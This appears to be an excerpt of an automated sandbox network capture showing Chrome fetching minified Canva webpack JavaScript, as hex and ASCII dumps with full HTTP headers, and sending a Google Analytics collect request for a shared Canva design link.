                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[8919],{/***/ 653425:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 72 74 3a 62 2d 65 2e 64 75 72 61 74 69 6f 6e 2c 65 6e 64 3a 62 7d 29 3b 63 2e 70 75 73 68 28 66 29 3b 63 6f 6e 73 74 20 7b 4b 3a 67 2c 46 3a 68 2c 63 6f 6e 74 69 6e 75 6f 75 73 3a 6b 7d 3d 63 2e 72 65 64 75 63 65 28 28 6c 2c 6d 29 3d 3e 28 7b 4b 3a 6d 2e 4b 3f 44 31 28 6d 2e 4b 2c 6c 2e 4b 29 3a 6c 2e 4b 2c 46 3a 6d 2e 46 3f 44 31 28 6d 2e 46 2c 6c 2e 46 29 3a 6c 2e 46 2c 63 6f 6e 74 69 6e 75 6f 75 73 3a 6d 2e 63 6f 6e 74 69 6e 75 6f 75 73 3f 44 31 28 6d 2e 63 6f 6e 74 69 6e 75 6f 75 73 2c 6c 2e 63 6f 6e 74 69 6e 75 6f 75 73 29 3a 6c 2e 63 6f 6e 74 69 6e 75 6f 75 73 7d 29 2c 7b 7d 29 3b 72 65 74 75 72 6e 7b 73 74 61 72 74 3a 61 2c 64 75 72 61 74 69 6f 6e 3a 62 2c 4b 3a 67 2c 0a 46 3a 68 2c 63 6f 6e 74 69 6e 75 6f 75 73 3a 6b 2c 74 72 61 6e 73 69 74 69 6f
                                                                                                                                                                                                                                                    Data Ascii: rt:b-e.duration,end:b});c.push(f);const {K:g,F:h,continuous:k}=c.reduce((l,m)=>({K:m.K?D1(m.K,l.K):l.K,F:m.F?D1(m.F,l.F):l.F,continuous:m.continuous?D1(m.continuous,l.continuous):l.continuous}),{});return{start:a,duration:b,K:g,F:h,continuous:k,transitio
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 74 22 3a 72 65 74 75 72 6e 7b 2e 2e 2e 64 2c 2e 2e 2e 63 28 64 29 2c 74 71 3a 64 2e 74 71 26 26 7b 4f 3a 64 2e 74 71 2e 4f 26 26 5f 5f 63 2e 47 65 28 64 2e 74 71 2e 4f 2c 65 3d 3e 28 7b 6f 70 61 63 69 74 79 3a 65 2e 6f 70 61 63 69 74 79 2c 72 6f 74 61 74 65 3a 76 6f 69 64 20 30 2c 73 63 61 6c 65 3a 76 6f 69 64 20 30 2c 62 6c 75 72 3a 76 6f 69 64 20 30 2c 65 61 3a 76 6f 69 64 20 30 2c 6e 61 3a 76 6f 69 64 20 30 2c 71 73 3a 76 6f 69 64 20 30 2c 57 67 3a 76 6f 69 64 20 30 7d 29 29 7d 7d 3b 64 65 66 61 75 6c 74 3a 74 68 72 6f 77 20 6e 65 77 20 5f 5f 63 2e 42 28 64 29 3b 7d 7d 29 7d 3b 78 65 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 3d 61 2e 47 55 28 62 29 3b 72 65 74 75 72 6e 20 61 2e 73 74 61 72 74 2e 67 65 74 28 29 2b 61 2e 64 75 72 61 74 69 6f 6e
                                                                                                                                                                                                                                                    Data Ascii: t":return{...d,...c(d),tq:d.tq&&{O:d.tq.O&&__c.Ge(d.tq.O,e=>({opacity:e.opacity,rotate:void 0,scale:void 0,blur:void 0,ea:void 0,na:void 0,qs:void 0,Wg:void 0}))}};default:throw new __c.B(d);}})};xeb=function(a,b){a=a.GU(b);return a.start.get()+a.duration
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 73 6f 6c 65 2e 67 72 6f 75 70 43 6f 6c 6c 61 70 73 65 64 28 60 5b 43 6f 6e 73 6f 6c 65 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 5d 3a 20 24 7b 61 7d 20 70 61 67 65 20 76 69 65 77 20 74 72 61 63 6b 65 64 60 29 3b 43 31 28 7b 7d 29 3b 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64 28 29 7d 74 72 61 63 6b 28 61 2c 62 29 7b 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 43 6f 6c 6c 61 70 73 65 64 28 60 5b 43 6f 6e 73 6f 6c 65 41 6e 61 6c 79 74 69 63 73 43 6c 69 65 6e 74 5d 3a 20 74 72 69 67 67 65 72 65 64 20 65 76 65 6e 74 20 24 7b 61 2e 79 6a 7d 60 29 3b 43 31 28 7b 2e 2e 2e 61 2e 6b 76 28 62 29 7d 29 3b 63 6f 6e 73 6f 6c 65 2e 67 72 6f 75 70 45 6e 64 28 29 7d 61 73 79 6e 63 20 72 65 73 65 74 28 29 7b 63 6f 6e 73 6f 6c 65 2e 69 6e 66 6f 28 22 5b 43 6f 6e 73 6f
                                                                                                                                                                                                                                                    Data Ascii: sole.groupCollapsed(`[ConsoleAnalyticsClient]: ${a} page view tracked`);C1({});console.groupEnd()}track(a,b){console.groupCollapsed(`[ConsoleAnalyticsClient]: triggered event ${a.yj}`);C1({...a.kv(b)});console.groupEnd()}async reset(){console.info("[Conso
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 64 26 26 7b 74 72 61 6e 73 69 74 69 6f 6e 3a 64 3f 22 74 72 61 6e 73 66 6f 72 6d 20 33 30 30 6d 73 20 65 61 73 65 2d 69 6e 2d 6f 75 74 2c 20 6f 70 61 63 69 74 79 20 33 30 30 6d 73 20 65 61 73 65 2d 69 6e 22 3a 76 6f 69 64 20 30 2c 6f 70 61 63 69 74 79 3a 30 2c 2e 2e 2e 59 65 62 5b 65 5d 7d 29 2c 74 6f 70 3a 6e 75 6c 6c 3d 3d 3d 61 7c 7c 76 6f 69 64 20 30 3d 3d 3d 61 3f 76 6f 69 64 20 30 3a 61 2e 67 65 74 28 29 7d 2c 72 65 66 3a 74 68 69 73 2e 6e 6f 64 65 52 65 66 2c 72 6f 6c 65 3a 22 73 74 61 74 75 73 22 2c 63 68 69 6c 64 72 65 6e 3a 63 26 26 4a 31 28 4e 31 2c 7b 6e 6f 74 69 66 69 63 61 74 69 6f 6e 3a 63 2c 72 37 3a 74 68 69 73 2e 72 37 2c 41 37 3a 74 68 69 73 2e 41 37 7d 29 7d 29 7d 7d 29 7d 29 7d 63 6f 6e 73 74 72 75 63 74 6f 72 28 2e 2e 2e 61 29 7b 73
                                                                                                                                                                                                                                                    Data Ascii: d&&{transition:d?"transform 300ms ease-in-out, opacity 300ms ease-in":void 0,opacity:0,...Yeb[e]}),top:null===a||void 0===a?void 0:a.get()},ref:this.nodeRef,role:"status",children:c&&J1(N1,{notification:c,r7:this.r7,A7:this.A7})})}})})}constructor(...a){s
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 4b 31 28 7b 5f 35 73 45 64 45 51 3a 68 7c 7c 6b 2c 61 6e 62 7a 37 67 3a 21 21 66 2c 61 73 4f 30 38 41 3a 74 68 69 73 2e 70 56 7d 2c 6d 2e 63 6c 61 73 73 4e 61 6d 65 2c 22 6e 63 48 33 77 51 22 29 2c 72 65 66 3a 74 68 69 73 2e 41 6f 61 2c 63 68 69 6c 64 72 65 6e 3a 5b 46 65 62 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 76 6b 58 33 49 41 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 66 26 26 4a 31 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 41 33 7a 66 66 41 22 2c 63 68 69 6c 64 72 65 6e 3a 66 2e 63 6f 6e 74 65 6e 74 7d 29 2c 4a 31 28 22 64 69 76 22 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 22 5f 35 70 44 55 44 41 22 2c 63 68 69 6c 64 72 65 6e 3a 4a 31 28 5f 5f 63 2e 73 76 2c 7b 77 65 69 67 68 74 3a 22
                                                                                                                                                                                                                                                    Data Ascii: iv",{className:K1({_5sEdEQ:h||k,anbz7g:!!f,asO08A:this.pV},m.className,"ncH3wQ"),ref:this.Aoa,children:[Feb("div",{className:"vkX3IA",children:[f&&J1("div",{className:"A3zffA",children:f.content}),J1("div",{className:"_5pDUDA",children:J1(__c.sv,{weight:"
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 68 2d 31 29 72 65 74 75 72 6e 20 61 3d 74 68 69 73 2e 59 49 5b 61 2b 31 5d 2c 74 68 69 73 2e 6f 6a 61 28 61 29 3f 61 2e 70 61 67 65 3a 76 6f 69 64 20 30 7d 67 65 74 20 64 75 72 61 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 61 3d 74 68 69 73 2e 24 4d 28 29 3b 72 65 74 75 72 6e 20 30 3d 3d 3d 61 2e 6c 65 6e 67 74 68 3f 30 3a 78 65 62 28 74 68 69 73 2c 61 5b 61 2e 6c 65 6e 67 74 68 2d 31 5d 29 7d 67 65 74 20 58 63 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 6c 61 79 69 6e 67 7c 7c 74 68 69 73 2e 6c 42 7d 67 65 74 20 70 72 6f 67 72 65 73 73 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 52 76 7d 67 65 74 20 6b 6a 61 28 29 7b 76 61 72 20 61 3b 72 65 74 75 72 6e 22 69 6e 64 65 66 69 6e 69 74 65 22 3d 3d 3d 28 6e 75 6c 6c 3d 3d 3d 28 61 3d 74 68 69 73 2e 6d 61 29
                                                                                                                                                                                                                                                    Data Ascii: h-1)return a=this.YI[a+1],this.oja(a)?a.page:void 0}get duration(){const a=this.$M();return 0===a.length?0:xeb(this,a[a.length-1])}get Xc(){return this.playing||this.lB}get progress(){return this.Rv}get kja(){var a;return"indefinite"===(null===(a=this.ma)
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 2e 70 6c 61 79 69 6e 67 26 26 28 74 68 69 73 2e 56 45 26 26 74 68 69 73 2e 52 76 2b 6d 3e 3d 74 68 69 73 2e 56 45 3f 28 74 68 69 73 2e 52 76 3d 74 68 69 73 2e 56 45 2c 74 68 69 73 2e 56 45 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 70 61 75 73 65 28 29 29 3a 74 68 69 73 2e 52 76 2b 3d 6d 2c 74 68 69 73 2e 52 76 3e 3d 74 68 69 73 2e 64 75 72 61 74 69 6f 6e 26 26 28 74 68 69 73 2e 6c 6f 6f 70 3f 74 68 69 73 2e 73 65 65 6b 28 30 29 3a 74 68 69 73 2e 70 61 75 73 65 28 29 29 29 3b 69 66 28 74 68 69 73 2e 6b 6a 61 26 26 74 68 69 73 2e 6c 42 29 7b 69 66 28 74 68 69 73 2e 77 6a 29 7b 76 61 72 20 6e 3d 74 68 69 73 2e 43 74 2e 67 65 74 28 74 68 69 73 2e 77 6a 29 7c 7c 30 3b 74 68 69 73 2e 43 74 2e 73 65 74 28 74 68 69 73 2e 77 6a 2c 6e 2b 6d 29 7d 74 68 69 73 2e 6e 65
                                                                                                                                                                                                                                                    Data Ascii: .playing&&(this.VE&&this.Rv+m>=this.VE?(this.Rv=this.VE,this.VE=void 0,this.pause()):this.Rv+=m,this.Rv>=this.duration&&(this.loop?this.seek(0):this.pause()));if(this.kja&&this.lB){if(this.wj){var n=this.Ct.get(this.wj)||0;this.Ct.set(this.wj,n+m)}this.ne
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC402INData Raw: 2e 6a 4d 28 7b 4a 64 3a 74 68 69 73 2e 7a 64 2c 73 65 72 76 69 63 65 4e 61 6d 65 3a 74 68 69 73 2e 51 61 2e 73 65 72 76 69 63 65 4e 61 6d 65 2c 6d 65 74 68 6f 64 4e 61 6d 65 3a 74 68 69 73 2e 51 61 2e 74 72 61 63 6b 2c 73 6d 3a 65 66 62 2e 50 61 2c 41 6c 3a 66 66 62 2e 52 61 7d 29 7d 7d 3b 5f 5f 63 2e 6e 79 61 3d 7b 7d 3b 5f 5f 63 2e 6e 79 61 2e 77 73 61 3d 67 66 62 3b 5f 5f 63 2e 51 31 3d 5f 5f 63 2e 69 62 28 28 29 3d 3e 5b 32 2c 22 52 41 53 54 45 52 22 2c 33 2c 22 56 45 43 54 4f 52 22 2c 34 2c 22 44 45 53 49 47 4e 22 2c 35 2c 22 46 4f 4e 54 22 2c 36 2c 22 45 4c 45 4d 45 4e 54 5f 47 52 4f 55 50 22 5d 29 3b 0a 7d 29 2e 63 61 6c 6c 28 73 65 6c 66 2c 20 73 65 6c 66 2e 5f 66 65 34 64 39 39 65 62 65 30 64 32 64 32 35 39 36 34 36 61 38 30 64 32 35 30 31 35 30
                                                                                                                                                                                                                                                    Data Ascii: .jM({Jd:this.zd,serviceName:this.Qa.serviceName,methodName:this.Qa.track,sm:efb.Pa,Al:ffb.Ra})}};__c.nya={};__c.nya.wsa=gfb;__c.Q1=__c.ib(()=>[2,"RASTER",3,"VECTOR",4,"DESIGN",5,"FONT",6,"ELEMENT_GROUP"]);}).call(self, self._fe4d99ebe0d2d259646a80d250150


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    82192.168.2.449838104.16.102.112443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC1563OUTGET /web/a69e6dc612146c74.js HTTP/1.1
                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                    Cookie: __cf_bm=S4BXcN.glTNGVESUyKg.DLiAuDWyP_N4zrOHtV6n3Xs-1734643639-1.0.1.1-eNSmz4Owinqd3T8CbXytVzFoYMEswGVHPgUnYsaWlL5SgZ_QSJ4rbaYKHw6w8LQQwnYmDmPcmXcuIZE3yEAZcg; _cfuvid=2.EbtKr5kVJi7grOFS3NOjtL6VML.HL._g1I9a7oPpg-1734643639707-0.0.1.1-604800000; cf_clearance=seJbdCFReQ8X7FRP8xj5KdCF6aVtkbK0ltFBRgiPpaA-1734643652-1.2.1.1-F7GANrUEdYEGcJEE7_Lqms6Fk.6es5izV2_35iKfbP1cUaIj6f4INdCgs6SLlanODcHhy.6yt1_MBMmxDYlbg2vF3Q76P_bRTxzU8PfQkF9hs01bBqzpxHdc3Pmxxh8cHMHaKok_5VKE6pJlNvA3pC7GAMIdaDnU4zXEUQDqngL9EFPru48PCWqVPZW17.FFC8IwE3PwFr45cPBDMtZPEoJdEmTDExzBukuPtM9uGRoAURI0DmR6KTvjDgBt5EsQHLsMAmBGMuabhFTmFqYqjVdkx8_9hPdhyYlVrrwcP_Sbye02rdb2HJfhC3v58x4LSTPH9E6jYgFkKfKO8qgkNeK0B6tVhXrkV.swlG.ikPUvuZiiYyY1Irbw.crvlKRD; _ga=GA1.1.2124219403.1734643655; _ga_EPWEMH6717=GS1.1.1734643654.1.0.1734643654.0.0.659039570; FPID=FPID2.2.LL74t9zFTA5xmGskwldRBU3NcijHs0WLYaB541gedDg%3D.1734643655; FPLC=MAQbZ7LoNLTcVgVa2jeEam7hsKcz%2BhrzXc8L4dhRg%2BygKya4oPWjGpNFRJ9uED0to3GIyvOle9%2F8ueCrRHFdccXQX73dvcYw87MtvIPl%2Fqk3rAkjhIteb020PcK4pw%3D% [TRUNCATED]
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                    Date: Thu, 19 Dec 2024 21:27:44 GMT
                                                                                                                                                                                                                                                    Content-Type: text/javascript
                                                                                                                                                                                                                                                    Content-Length: 4342
                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                    CF-Ray: 8f4a7a741c3d43e2-EWR
                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                    Age: 71073
                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                    ETag: "09b8a90f25c53311a2c0d17023a001b7"
                                                                                                                                                                                                                                                    Expires: Sat, 20 Dec 2025 03:16:30 GMT
                                                                                                                                                                                                                                                    Last-Modified: Thu, 19 Dec 2024 01:30:33 GMT
                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sat, 20 Dec 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                    x-amz-id-2: 0hL2CFwT3rVOOsRYjkvtIjeghCQBxzxSF8MipqgfprvypBOdLo6TjvFspwe+F1RsRVPNsgawQUY=
                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                    x-amz-request-id: XWYPZY9EMWDF525G
                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                    x-amz-version-id: SglXulJjhJgla2g3vgqWvCsU5BtHOK2H
                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC356INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 57 54 6e 4c 58 57 62 70 55 76 4d 71 72 59 32 39 74 4b 4a 31 30 25 32 46 25 32 46 25 32 42 6c 76 45 75 61 6e 61 79 6f 76 65 25 32 42 62 42 71 53 45 54 54 6e 49 70 49 7a 25 32 46 4a 4f 69 42 67 65 38 44 32 44 75 47 25 32 46 64 64 65 4e 51 42 4a 51 48 77 68 59 53 4d 51 74 5a 35 64 39 32 50 70 31 56 4c 37 77 6a 43 30 58 52 4a 34 47 65 71 35 36 51 75 30 48 39 46 4f 55 68 43 72 6b 46 58 6b 72 71 73 37 69 45 78 64 35 65 45 73 6b 63 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a
                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WTnLXWbpUvMqrY29tKJ10%2F%2F%2BlvEuanayove%2BbBqSETTnIpIz%2FJOiBge8D2DuG%2FddeNQBJQHwhYSMQtZ5d92Pp1VL7wjC0XRJ4Geq56Qu0H9FOUhCrkFXkrqs7iExd5eEskc%3D"}],"group":"cf-nel","max_age":
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 28 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 3d 20 73 65 6c 66 5b 22 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 63 61 6e 76 61 5f 77 65 62 22 5d 20 7c 7c 20 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 37 36 39 5d 2c 7b 0a 0a 2f 2a 2a 2a 2f 20 37 33 32 32 31 39 3a 0a 66 75 6e 63 74 69 6f 6e 28 5f 2c 20 5f 5f 2c 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 29 20 7b 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 5f 78 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 2e 6e 3b 63 6f 6e 73 74 20 5f 5f 77 65 62 5f 72 65 71 5f 5f 20 3d 20 5f 5f 77 65 62 70 61 63 6b 5f 72 65 71 75 69 72 65 5f 5f 3b 5f 5f 77 65 62 5f 72 65 71 5f 5f 28 38 31 33 31 31 30 29 3b 5f 5f 77 65 62 5f 72
                                                                                                                                                                                                                                                    Data Ascii: (self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[5769],{/***/ 732219:function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);__web_r
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 50 22 29 3b 69 66 28 30 3e 64 29 72 65 74 75 72 6e 20 63 2e 61 64 2e 65 6e 64 28 22 65 72 72 6f 72 22 2c 0a 6e 65 77 20 4d 61 70 28 5b 5b 22 65 72 72 6f 72 5f 72 65 61 73 6f 6e 22 2c 22 49 4e 56 41 4c 49 44 5f 49 4e 54 45 52 41 43 54 49 4f 4e 5f 54 49 4d 45 53 54 41 4d 50 22 5d 5d 29 29 2c 47 61 28 22 49 4e 56 41 4c 49 44 5f 49 4e 54 45 52 41 43 54 49 4f 4e 5f 54 49 4d 45 53 54 41 4d 50 22 29 3b 69 66 28 31 32 45 34 3c 3d 64 29 72 65 74 75 72 6e 20 63 2e 61 64 2e 65 6e 64 28 22 65 72 72 6f 72 22 2c 6e 65 77 20 4d 61 70 28 5b 5b 22 65 72 72 6f 72 5f 72 65 61 73 6f 6e 22 2c 22 41 42 4f 56 45 5f 49 44 4c 45 5f 54 48 52 45 53 48 4f 4c 44 22 5d 5d 29 29 2c 47 61 28 22 41 42 4f 56 45 5f 49 44 4c 45 5f 54 48 52 45 53 48 4f 4c 44 22 29 3b 64 3d 35 45 33 3c 3d 64
                                                                                                                                                                                                                                                    Data Ascii: P");if(0>d)return c.ad.end("error",new Map([["error_reason","INVALID_INTERACTION_TIMESTAMP"]])),Ga("INVALID_INTERACTION_TIMESTAMP");if(12E4<=d)return c.ad.end("error",new Map([["error_reason","ABOVE_IDLE_THRESHOLD"]])),Ga("ABOVE_IDLE_THRESHOLD");d=5E3<=d
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC1369INData Raw: 79 64 6f 77 6e 22 2c 63 2c 64 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 66 6f 63 75 73 22 2c 63 29 3b 61 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 62 6c 75 72 22 2c 62 29 3b 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 76 69 73 69 62 69 6c 69 74 79 63 68 61 6e 67 65 22 2c 66 29 7d 7d 3b 76 61 72 20 43 71 62 3d 5b 31 2c 32 2c 33 2c 35 2c 35 2c 35 2c 31 30 2c 31 35 2c 33 30 2c 36 30 5d 2c 44 71 62 3d 63 6c 61 73 73 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 61 29 7b 74 68 69 73 2e 73 74 61 74 65 3d 7b 74 79 70 65 3a 31 7d 3b 74 68 69 73 2e 66 35 3d 74 68 69 73 2e 64 6f 61 3d 30 3b 74 68 69 73 2e 6c 71 3d 61 2e 74 35 7d 7d 2c 45 71 62 3d 63 6c 61 73 73 7b 61 73
                                                                                                                                                                                                                                                    Data Ascii: ydown",c,d);a.removeEventListener("focus",c);a.removeEventListener("blur",b);document.removeEventListener("visibilitychange",f)}};var Cqb=[1,2,3,5,5,5,10,15,30,60],Dqb=class{constructor(a){this.state={type:1};this.f5=this.doa=0;this.lq=a.t5}},Eqb=class{as
                                                                                                                                                                                                                                                    2024-12-19 21:27:44 UTC235INData Raw: 73 2e 6c 66 61 3d 61 7d 7d 3b 5f 5f 63 2e 46 59 3d 7b 43 72 61 3a 7b 45 4f 61 3a 30 2c 6f 4f 61 3a 31 2c 66 74 61 3a 32 7d 7d 3b 5f 5f 63 2e 46 59 2e 6c 66 61 3d 48 71 62 3b 5f 5f 63 2e 46 59 2e 6c 54 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 4a 71 62 28 62 3d 3e 48 71 62 28 7b 2e 2e 2e 61 2c 74 35 3a 62 7d 29 29 7d 3b 0a 7d 29 2e 63 61 6c 6c 28 73 65 6c 66 2c 20 73 65 6c 66 2e 5f 66 65 34 64 39 39 65 62 65 30 64 32 64 32 35 39 36 34 36 61 38 30 64 32 35 30 31 35 30 64 34 37 29 3b 7d 0a 0a 7d 5d 29 0a 2f 2f 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 73 6f 75 72 63 65 6d 61 70 73 2f 61 36 39 65 36 64 63 36 31 32 31 34 36 63 37 34 2e 6a 73 2e 6d 61 70
                                                                                                                                                                                                                                                    Data Ascii: s.lfa=a}};__c.FY={Cra:{EOa:0,oOa:1,fta:2}};__c.FY.lfa=Hqb;__c.FY.lTa=function(a){return new Jqb(b=>Hqb({...a,t5:b}))};}).call(self, self._fe4d99ebe0d2d259646a80d250150d47);}}])//# sourceMappingURL=sourcemaps/a69e6dc612146c74.js.map


                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                    83192.168.2.449839216.239.34.21443600C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                    2024-12-19 21:27:43 UTC2106OUTGET /g/collect?v=2&tid=G-EPWEMH6717&gtm=45je4cc1v872399471za200zb812729902&_p=1734643647572&gcd=13l3l3l3l1l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&cid=2124219403.1734643655&ecid=659039570&ul=en-us&sr=1280x1024&_fplc=0&ur=US-OH&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&are=1&frm=0&pscdl=noapi&ec_mode=c&_eu=AEA&sst.tft=1734643647572&sst.sp=1&sst.em_event=1&sst.ude=0&_s=3&dl=https%3A%2F%2Fwww.canva.com%2Fdesign%2Fdesign-id%2Faccess-code%2Fview%3Futm_content%3DDAGZxEJMIA0%26utm_campaign%3Ddesignshare%26utm_medium%3Dlink2%26utm_source%3Duniquelinks%26utlId%3Dhdcdec8ed4a&dr=&dt=Canva%20Design&sid=1734643654&sct=1&seg=0&en=scroll&ep.gtm_web_details=GTM-TZPTKRR%20%7C%20297&ep.event_id=1734644380069_17346437651480&ep.custom_dicbo=not%20set&ep.custom_consent_gtm_outbrain=no&ep.custom_consent_gtm_fpc_rtid=no&epn.custom_data_newSession2=0&ep.custom_device_category=desktop&ep. [TRUNCATED]
                                                                                                                                                                                                                                                    Host: ct.canva.com
                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
